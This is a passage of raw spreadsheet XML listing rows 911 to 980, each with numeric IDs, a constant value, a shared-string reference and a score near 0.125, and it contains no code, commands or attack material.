      <c r="B911" s="2">
        <v>4.1719746E7</v>
      </c>
      <c r="C911" s="2" t="s">
        <v>805</v>
      </c>
      <c r="D911" s="2">
        <v>1.0</v>
      </c>
      <c r="E911" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F911" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="912" ht="15.75" customHeight="1">
      <c r="A912" s="1">
        <v>16329.0</v>
      </c>
      <c r="B912" s="2">
        <v>4.6003592E7</v>
      </c>
      <c r="C912" s="2" t="s">
        <v>806</v>
      </c>
      <c r="D912" s="2">
        <v>1.0</v>
      </c>
      <c r="E912" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F912" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="913" ht="15.75" customHeight="1">
      <c r="A913" s="1">
        <v>16694.0</v>
      </c>
      <c r="B913" s="2">
        <v>4.736062E7</v>
      </c>
      <c r="C913" s="2" t="s">
        <v>807</v>
      </c>
      <c r="D913" s="2">
        <v>1.0</v>
      </c>
      <c r="E913" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F913" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="914" ht="15.75" customHeight="1">
      <c r="A914" s="1">
        <v>17184.0</v>
      </c>
      <c r="B914" s="2">
        <v>4.891068E7</v>
      </c>
      <c r="C914" s="2" t="s">
        <v>808</v>
      </c>
      <c r="D914" s="2">
        <v>1.0</v>
      </c>
      <c r="E914" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F914" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="915" ht="15.75" customHeight="1">
      <c r="A915" s="1">
        <v>17716.0</v>
      </c>
      <c r="B915" s="2">
        <v>5.0616054E7</v>
      </c>
      <c r="C915" s="2" t="s">
        <v>809</v>
      </c>
      <c r="D915" s="2">
        <v>1.0</v>
      </c>
      <c r="E915" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F915" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="916" ht="15.75" customHeight="1">
      <c r="A916" s="1">
        <v>18390.0</v>
      </c>
      <c r="B916" s="2">
        <v>5.2605848E7</v>
      </c>
      <c r="C916" s="2" t="s">
        <v>810</v>
      </c>
      <c r="D916" s="2">
        <v>1.0</v>
      </c>
      <c r="E916" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F916" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="917" ht="15.75" customHeight="1">
      <c r="A917" s="1">
        <v>18481.0</v>
      </c>
      <c r="B917" s="2">
        <v>5.288546E7</v>
      </c>
      <c r="C917" s="2" t="s">
        <v>811</v>
      </c>
      <c r="D917" s="2">
        <v>1.0</v>
      </c>
      <c r="E917" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F917" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="918" ht="15.75" customHeight="1">
      <c r="A918" s="1">
        <v>18745.0</v>
      </c>
      <c r="B918" s="2">
        <v>5.3748222E7</v>
      </c>
      <c r="C918" s="2" t="s">
        <v>812</v>
      </c>
      <c r="D918" s="2">
        <v>1.0</v>
      </c>
      <c r="E918" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F918" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="919" ht="15.75" customHeight="1">
      <c r="A919" s="1">
        <v>18760.0</v>
      </c>
      <c r="B919" s="2">
        <v>5.3789958E7</v>
      </c>
      <c r="C919" s="2" t="s">
        <v>813</v>
      </c>
      <c r="D919" s="2">
        <v>1.0</v>
      </c>
      <c r="E919" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F919" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="920" ht="15.75" customHeight="1">
      <c r="A920" s="1">
        <v>20296.0</v>
      </c>
      <c r="B920" s="2">
        <v>1.1301146E7</v>
      </c>
      <c r="C920" s="2" t="s">
        <v>814</v>
      </c>
      <c r="D920" s="2">
        <v>1.0</v>
      </c>
      <c r="E920" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F920" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="921" ht="15.75" customHeight="1">
      <c r="A921" s="1">
        <v>20353.0</v>
      </c>
      <c r="B921" s="2">
        <v>1.1657938E7</v>
      </c>
      <c r="C921" s="2" t="s">
        <v>815</v>
      </c>
      <c r="D921" s="2">
        <v>1.0</v>
      </c>
      <c r="E921" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F921" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="922" ht="15.75" customHeight="1">
      <c r="A922" s="1">
        <v>20592.0</v>
      </c>
      <c r="B922" s="2">
        <v>1.3797661E7</v>
      </c>
      <c r="C922" s="2" t="s">
        <v>816</v>
      </c>
      <c r="D922" s="2">
        <v>1.0</v>
      </c>
      <c r="E922" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F922" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="923" ht="15.75" customHeight="1">
      <c r="A923" s="1">
        <v>20754.0</v>
      </c>
      <c r="B923" s="2">
        <v>1.4878803E7</v>
      </c>
      <c r="C923" s="2" t="s">
        <v>817</v>
      </c>
      <c r="D923" s="2">
        <v>1.0</v>
      </c>
      <c r="E923" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F923" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="924" ht="15.75" customHeight="1">
      <c r="A924" s="1">
        <v>21275.0</v>
      </c>
      <c r="B924" s="2">
        <v>2.0233406E7</v>
      </c>
      <c r="C924" s="2" t="s">
        <v>818</v>
      </c>
      <c r="D924" s="2">
        <v>1.0</v>
      </c>
      <c r="E924" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F924" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="925" ht="15.75" customHeight="1">
      <c r="A925" s="1">
        <v>21388.0</v>
      </c>
      <c r="B925" s="2">
        <v>2.1749068E7</v>
      </c>
      <c r="C925" s="2" t="s">
        <v>819</v>
      </c>
      <c r="D925" s="2">
        <v>1.0</v>
      </c>
      <c r="E925" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F925" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="926" ht="15.75" customHeight="1">
      <c r="A926" s="1">
        <v>21536.0</v>
      </c>
      <c r="B926" s="2">
        <v>2.3509748E7</v>
      </c>
      <c r="C926" s="2" t="s">
        <v>820</v>
      </c>
      <c r="D926" s="2">
        <v>1.0</v>
      </c>
      <c r="E926" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F926" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="927" ht="15.75" customHeight="1">
      <c r="A927" s="1">
        <v>21643.0</v>
      </c>
      <c r="B927" s="2">
        <v>2.4746954E7</v>
      </c>
      <c r="C927" s="2" t="s">
        <v>821</v>
      </c>
      <c r="D927" s="2">
        <v>1.0</v>
      </c>
      <c r="E927" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F927" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="928" ht="15.75" customHeight="1">
      <c r="A928" s="1">
        <v>21759.0</v>
      </c>
      <c r="B928" s="2">
        <v>2.6111585E7</v>
      </c>
      <c r="C928" s="2" t="s">
        <v>822</v>
      </c>
      <c r="D928" s="2">
        <v>1.0</v>
      </c>
      <c r="E928" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F928" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="929" ht="15.75" customHeight="1">
      <c r="A929" s="1">
        <v>21897.0</v>
      </c>
      <c r="B929" s="2">
        <v>2.784802E7</v>
      </c>
      <c r="C929" s="2" t="s">
        <v>823</v>
      </c>
      <c r="D929" s="2">
        <v>1.0</v>
      </c>
      <c r="E929" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F929" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="930" ht="15.75" customHeight="1">
      <c r="A930" s="1">
        <v>22364.0</v>
      </c>
      <c r="B930" s="2">
        <v>3.4888086E7</v>
      </c>
      <c r="C930" s="2" t="s">
        <v>824</v>
      </c>
      <c r="D930" s="2">
        <v>1.0</v>
      </c>
      <c r="E930" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F930" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="931" ht="15.75" customHeight="1">
      <c r="A931" s="1">
        <v>22453.0</v>
      </c>
      <c r="B931" s="2">
        <v>3625218.0</v>
      </c>
      <c r="C931" s="2" t="s">
        <v>825</v>
      </c>
      <c r="D931" s="2">
        <v>1.0</v>
      </c>
      <c r="E931" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F931" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="932" ht="15.75" customHeight="1">
      <c r="A932" s="1">
        <v>22794.0</v>
      </c>
      <c r="B932" s="2">
        <v>4550986.0</v>
      </c>
      <c r="C932" s="2" t="s">
        <v>826</v>
      </c>
      <c r="D932" s="2">
        <v>1.0</v>
      </c>
      <c r="E932" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F932" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="933" ht="15.75" customHeight="1">
      <c r="A933" s="1">
        <v>22934.0</v>
      </c>
      <c r="B933" s="2">
        <v>4.8694111E7</v>
      </c>
      <c r="C933" s="2" t="s">
        <v>827</v>
      </c>
      <c r="D933" s="2">
        <v>1.0</v>
      </c>
      <c r="E933" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F933" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="934" ht="15.75" customHeight="1">
      <c r="A934" s="1">
        <v>23036.0</v>
      </c>
      <c r="B934" s="2">
        <v>5.0091287E7</v>
      </c>
      <c r="C934" s="2" t="s">
        <v>828</v>
      </c>
      <c r="D934" s="2">
        <v>1.0</v>
      </c>
      <c r="E934" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F934" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="935" ht="15.75" customHeight="1">
      <c r="A935" s="1">
        <v>23298.0</v>
      </c>
      <c r="B935" s="2">
        <v>5.4001784E7</v>
      </c>
      <c r="C935" s="2" t="s">
        <v>829</v>
      </c>
      <c r="D935" s="2">
        <v>1.0</v>
      </c>
      <c r="E935" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F935" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="936" ht="15.75" customHeight="1">
      <c r="A936" s="1">
        <v>23819.0</v>
      </c>
      <c r="B936" s="2">
        <v>7979985.0</v>
      </c>
      <c r="C936" s="2" t="s">
        <v>830</v>
      </c>
      <c r="D936" s="2">
        <v>1.0</v>
      </c>
      <c r="E936" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F936" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="937" ht="15.75" customHeight="1">
      <c r="A937" s="1">
        <v>23870.0</v>
      </c>
      <c r="B937" s="2">
        <v>8342154.0</v>
      </c>
      <c r="C937" s="2" t="s">
        <v>831</v>
      </c>
      <c r="D937" s="2">
        <v>1.0</v>
      </c>
      <c r="E937" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F937" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="938" ht="15.75" customHeight="1">
      <c r="A938" s="1">
        <v>24558.0</v>
      </c>
      <c r="B938" s="2">
        <v>1.1301145E7</v>
      </c>
      <c r="C938" s="2" t="s">
        <v>814</v>
      </c>
      <c r="D938" s="2">
        <v>1.0</v>
      </c>
      <c r="E938" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F938" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="939" ht="15.75" customHeight="1">
      <c r="A939" s="1">
        <v>24706.0</v>
      </c>
      <c r="B939" s="2">
        <v>1.1657937E7</v>
      </c>
      <c r="C939" s="2" t="s">
        <v>815</v>
      </c>
      <c r="D939" s="2">
        <v>1.0</v>
      </c>
      <c r="E939" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F939" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="940" ht="15.75" customHeight="1">
      <c r="A940" s="1">
        <v>24908.0</v>
      </c>
      <c r="B940" s="2">
        <v>1.2312943E7</v>
      </c>
      <c r="C940" s="2" t="s">
        <v>832</v>
      </c>
      <c r="D940" s="2">
        <v>1.0</v>
      </c>
      <c r="E940" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F940" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="941" ht="15.75" customHeight="1">
      <c r="A941" s="1">
        <v>26375.0</v>
      </c>
      <c r="B941" s="2">
        <v>1.6934184E7</v>
      </c>
      <c r="C941" s="2" t="s">
        <v>833</v>
      </c>
      <c r="D941" s="2">
        <v>1.0</v>
      </c>
      <c r="E941" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F941" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="942" ht="15.75" customHeight="1">
      <c r="A942" s="1">
        <v>26496.0</v>
      </c>
      <c r="B942" s="2">
        <v>1.7528222E7</v>
      </c>
      <c r="C942" s="2" t="s">
        <v>834</v>
      </c>
      <c r="D942" s="2">
        <v>1.0</v>
      </c>
      <c r="E942" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F942" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="943" ht="15.75" customHeight="1">
      <c r="A943" s="1">
        <v>26652.0</v>
      </c>
      <c r="B943" s="2">
        <v>1.8059799E7</v>
      </c>
      <c r="C943" s="2" t="s">
        <v>835</v>
      </c>
      <c r="D943" s="2">
        <v>1.0</v>
      </c>
      <c r="E943" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F943" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="944" ht="15.75" customHeight="1">
      <c r="A944" s="1">
        <v>27293.0</v>
      </c>
      <c r="B944" s="2">
        <v>2.128193E7</v>
      </c>
      <c r="C944" s="2" t="s">
        <v>836</v>
      </c>
      <c r="D944" s="2">
        <v>1.0</v>
      </c>
      <c r="E944" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F944" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="945" ht="15.75" customHeight="1">
      <c r="A945" s="1">
        <v>27379.0</v>
      </c>
      <c r="B945" s="2">
        <v>2.1749067E7</v>
      </c>
      <c r="C945" s="2" t="s">
        <v>819</v>
      </c>
      <c r="D945" s="2">
        <v>1.0</v>
      </c>
      <c r="E945" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F945" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="946" ht="15.75" customHeight="1">
      <c r="A946" s="1">
        <v>27462.0</v>
      </c>
      <c r="B946" s="2">
        <v>2.1987265E7</v>
      </c>
      <c r="C946" s="2" t="s">
        <v>837</v>
      </c>
      <c r="D946" s="2">
        <v>1.0</v>
      </c>
      <c r="E946" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F946" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="947" ht="15.75" customHeight="1">
      <c r="A947" s="1">
        <v>27685.0</v>
      </c>
      <c r="B947" s="2">
        <v>2.2972405E7</v>
      </c>
      <c r="C947" s="2" t="s">
        <v>838</v>
      </c>
      <c r="D947" s="2">
        <v>1.0</v>
      </c>
      <c r="E947" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F947" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="948" ht="15.75" customHeight="1">
      <c r="A948" s="1">
        <v>28113.0</v>
      </c>
      <c r="B948" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C948" s="2" t="s">
        <v>839</v>
      </c>
      <c r="D948" s="2">
        <v>1.0</v>
      </c>
      <c r="E948" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F948" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="949" ht="15.75" customHeight="1">
      <c r="A949" s="1">
        <v>28381.0</v>
      </c>
      <c r="B949" s="2">
        <v>2.6111584E7</v>
      </c>
      <c r="C949" s="2" t="s">
        <v>840</v>
      </c>
      <c r="D949" s="2">
        <v>1.0</v>
      </c>
      <c r="E949" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F949" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="950" ht="15.75" customHeight="1">
      <c r="A950" s="1">
        <v>28489.0</v>
      </c>
      <c r="B950" s="2">
        <v>2.6668519E7</v>
      </c>
      <c r="C950" s="2" t="s">
        <v>841</v>
      </c>
      <c r="D950" s="2">
        <v>1.0</v>
      </c>
      <c r="E950" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F950" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="951" ht="15.75" customHeight="1">
      <c r="A951" s="1">
        <v>28716.0</v>
      </c>
      <c r="B951" s="2">
        <v>2.7848019E7</v>
      </c>
      <c r="C951" s="2" t="s">
        <v>842</v>
      </c>
      <c r="D951" s="2">
        <v>1.0</v>
      </c>
      <c r="E951" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F951" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="952" ht="15.75" customHeight="1">
      <c r="A952" s="1">
        <v>28761.0</v>
      </c>
      <c r="B952" s="2">
        <v>2.8177591E7</v>
      </c>
      <c r="C952" s="2" t="s">
        <v>843</v>
      </c>
      <c r="D952" s="2">
        <v>1.0</v>
      </c>
      <c r="E952" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F952" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="953" ht="15.75" customHeight="1">
      <c r="A953" s="1">
        <v>29454.0</v>
      </c>
      <c r="B953" s="2">
        <v>3.2249452E7</v>
      </c>
      <c r="C953" s="2" t="s">
        <v>822</v>
      </c>
      <c r="D953" s="2">
        <v>1.0</v>
      </c>
      <c r="E953" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F953" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="954" ht="15.75" customHeight="1">
      <c r="A954" s="1">
        <v>29611.0</v>
      </c>
      <c r="B954" s="2">
        <v>3.3596438E7</v>
      </c>
      <c r="C954" s="2" t="s">
        <v>844</v>
      </c>
      <c r="D954" s="2">
        <v>1.0</v>
      </c>
      <c r="E954" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F954" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="955" ht="15.75" customHeight="1">
      <c r="A955" s="1">
        <v>30036.0</v>
      </c>
      <c r="B955" s="2">
        <v>3.6207907E7</v>
      </c>
      <c r="C955" s="2" t="s">
        <v>845</v>
      </c>
      <c r="D955" s="2">
        <v>1.0</v>
      </c>
      <c r="E955" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F955" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="956" ht="15.75" customHeight="1">
      <c r="A956" s="1">
        <v>30421.0</v>
      </c>
      <c r="B956" s="2">
        <v>3.894059E7</v>
      </c>
      <c r="C956" s="2" t="s">
        <v>846</v>
      </c>
      <c r="D956" s="2">
        <v>1.0</v>
      </c>
      <c r="E956" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F956" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="957" ht="15.75" customHeight="1">
      <c r="A957" s="1">
        <v>30473.0</v>
      </c>
      <c r="B957" s="2">
        <v>3.9599804E7</v>
      </c>
      <c r="C957" s="2" t="s">
        <v>847</v>
      </c>
      <c r="D957" s="2">
        <v>1.0</v>
      </c>
      <c r="E957" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F957" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="958" ht="15.75" customHeight="1">
      <c r="A958" s="1">
        <v>30526.0</v>
      </c>
      <c r="B958" s="2">
        <v>4.0317195E7</v>
      </c>
      <c r="C958" s="2" t="s">
        <v>848</v>
      </c>
      <c r="D958" s="2">
        <v>1.0</v>
      </c>
      <c r="E958" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F958" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="959" ht="15.75" customHeight="1">
      <c r="A959" s="1">
        <v>30618.0</v>
      </c>
      <c r="B959" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C959" s="2" t="s">
        <v>849</v>
      </c>
      <c r="D959" s="2">
        <v>1.0</v>
      </c>
      <c r="E959" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F959" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="960" ht="15.75" customHeight="1">
      <c r="A960" s="1">
        <v>30795.0</v>
      </c>
      <c r="B960" s="2">
        <v>4.511223E7</v>
      </c>
      <c r="C960" s="2" t="s">
        <v>850</v>
      </c>
      <c r="D960" s="2">
        <v>1.0</v>
      </c>
      <c r="E960" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F960" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="961" ht="15.75" customHeight="1">
      <c r="A961" s="1">
        <v>31316.0</v>
      </c>
      <c r="B961" s="2">
        <v>4972643.0</v>
      </c>
      <c r="C961" s="2" t="s">
        <v>851</v>
      </c>
      <c r="D961" s="2">
        <v>1.0</v>
      </c>
      <c r="E961" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F961" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="962" ht="15.75" customHeight="1">
      <c r="A962" s="1">
        <v>31317.0</v>
      </c>
      <c r="B962" s="2">
        <v>4.9730391E7</v>
      </c>
      <c r="C962" s="2" t="s">
        <v>852</v>
      </c>
      <c r="D962" s="2">
        <v>1.0</v>
      </c>
      <c r="E962" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F962" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="963" ht="15.75" customHeight="1">
      <c r="A963" s="1">
        <v>31394.0</v>
      </c>
      <c r="B963" s="2">
        <v>4.9992928E7</v>
      </c>
      <c r="C963" s="2" t="s">
        <v>853</v>
      </c>
      <c r="D963" s="2">
        <v>1.0</v>
      </c>
      <c r="E963" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F963" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="964" ht="15.75" customHeight="1">
      <c r="A964" s="1">
        <v>31438.0</v>
      </c>
      <c r="B964" s="2">
        <v>5.018059E7</v>
      </c>
      <c r="C964" s="2" t="s">
        <v>854</v>
      </c>
      <c r="D964" s="2">
        <v>1.0</v>
      </c>
      <c r="E964" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F964" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="965" ht="15.75" customHeight="1">
      <c r="A965" s="1">
        <v>31511.0</v>
      </c>
      <c r="B965" s="2">
        <v>5.0738302E7</v>
      </c>
      <c r="C965" s="2" t="s">
        <v>855</v>
      </c>
      <c r="D965" s="2">
        <v>1.0</v>
      </c>
      <c r="E965" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F965" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="966" ht="15.75" customHeight="1">
      <c r="A966" s="1">
        <v>32098.0</v>
      </c>
      <c r="B966" s="2">
        <v>5.4001783E7</v>
      </c>
      <c r="C966" s="2" t="s">
        <v>829</v>
      </c>
      <c r="D966" s="2">
        <v>1.0</v>
      </c>
      <c r="E966" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F966" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="967" ht="15.75" customHeight="1">
      <c r="A967" s="1">
        <v>32922.0</v>
      </c>
      <c r="B967" s="2">
        <v>6423393.0</v>
      </c>
      <c r="C967" s="2" t="s">
        <v>856</v>
      </c>
      <c r="D967" s="2">
        <v>1.0</v>
      </c>
      <c r="E967" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F967" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="968" ht="15.75" customHeight="1">
      <c r="A968" s="1">
        <v>33596.0</v>
      </c>
      <c r="B968" s="2">
        <v>8338289.0</v>
      </c>
      <c r="C968" s="2" t="s">
        <v>857</v>
      </c>
      <c r="D968" s="2">
        <v>1.0</v>
      </c>
      <c r="E968" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F968" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="969" ht="15.75" customHeight="1">
      <c r="A969" s="1">
        <v>125.0</v>
      </c>
      <c r="B969" s="2">
        <v>1.3160461E7</v>
      </c>
      <c r="C969" s="2" t="s">
        <v>858</v>
      </c>
      <c r="D969" s="2">
        <v>1.0</v>
      </c>
      <c r="E969" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F969" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="970" ht="15.75" customHeight="1">
      <c r="A970" s="1">
        <v>8751.0</v>
      </c>
      <c r="B970" s="2">
        <v>5.4550051E7</v>
      </c>
      <c r="C970" s="2" t="s">
        <v>859</v>
      </c>
      <c r="D970" s="2">
        <v>1.0</v>
      </c>
      <c r="E970" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F970" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="971" ht="15.75" customHeight="1">
      <c r="A971" s="1">
        <v>18656.0</v>
      </c>
      <c r="B971" s="2">
        <v>5.3487808E7</v>
      </c>
      <c r="C971" s="2" t="s">
        <v>860</v>
      </c>
      <c r="D971" s="2">
        <v>1.0</v>
      </c>
      <c r="E971" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F971" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="972" ht="15.75" customHeight="1">
      <c r="A972" s="1">
        <v>21690.0</v>
      </c>
      <c r="B972" s="2">
        <v>2.521955E7</v>
      </c>
      <c r="C972" s="2" t="s">
        <v>861</v>
      </c>
      <c r="D972" s="2">
        <v>1.0</v>
      </c>
      <c r="E972" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F972" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="973" ht="15.75" customHeight="1">
      <c r="A973" s="1">
        <v>27788.0</v>
      </c>
      <c r="B973" s="2">
        <v>2.313107E7</v>
      </c>
      <c r="C973" s="2" t="s">
        <v>862</v>
      </c>
      <c r="D973" s="2">
        <v>1.0</v>
      </c>
      <c r="E973" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F973" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="974" ht="15.75" customHeight="1">
      <c r="A974" s="1">
        <v>28239.0</v>
      </c>
      <c r="B974" s="2">
        <v>2.5219549E7</v>
      </c>
      <c r="C974" s="2" t="s">
        <v>861</v>
      </c>
      <c r="D974" s="2">
        <v>1.0</v>
      </c>
      <c r="E974" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F974" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="975" ht="15.75" customHeight="1">
      <c r="A975" s="1">
        <v>31117.0</v>
      </c>
      <c r="B975" s="2">
        <v>4.8791965E7</v>
      </c>
      <c r="C975" s="2" t="s">
        <v>863</v>
      </c>
      <c r="D975" s="2">
        <v>1.0</v>
      </c>
      <c r="E975" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F975" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="976" ht="15.75" customHeight="1">
      <c r="A976" s="1">
        <v>21243.0</v>
      </c>
      <c r="B976" s="2">
        <v>1.979887E7</v>
      </c>
      <c r="C976" s="2" t="s">
        <v>864</v>
      </c>
      <c r="D976" s="2">
        <v>1.0</v>
      </c>
      <c r="E976" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F976" s="2">
        <v>0.1254789272030652</v>
      </c>
    </row>
    <row r="977" ht="15.75" customHeight="1">
      <c r="A977" s="1">
        <v>20525.0</v>
      </c>
      <c r="B977" s="2">
        <v>1.3142128E7</v>
      </c>
      <c r="C977" s="2" t="s">
        <v>865</v>
      </c>
      <c r="D977" s="2">
        <v>1.0</v>
      </c>
      <c r="E977" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F977" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="978" ht="15.75" customHeight="1">
      <c r="A978" s="1">
        <v>22226.0</v>
      </c>
      <c r="B978" s="2">
        <v>3.233354E7</v>
      </c>
      <c r="C978" s="2" t="s">
        <v>866</v>
      </c>
      <c r="D978" s="2">
        <v>1.0</v>
      </c>
      <c r="E978" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F978" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="979" ht="15.75" customHeight="1">
      <c r="A979" s="1">
        <v>25187.0</v>
      </c>
      <c r="B979" s="2">
        <v>1.3142127E7</v>
      </c>
      <c r="C979" s="2" t="s">
        <v>865</v>
      </c>
      <c r="D979" s="2">
        <v>1.0</v>
      </c>
      <c r="E979" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F979" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="980" ht="15.75" customHeight="1">
      <c r="A980" s="1">
        <v>25884.0</v>
      </c>
      <c r="B980" s="2">
        <v>1.4972945E7</v>
      </c>
      <c r="C980" s="2" t="s">
        <v>867</v>
      </c>
      <c r="D980" s="2">
        <v>1.0</v>
      </c>
      <c r="E980" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F980" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="981" ht="15.75" customHeight="1">
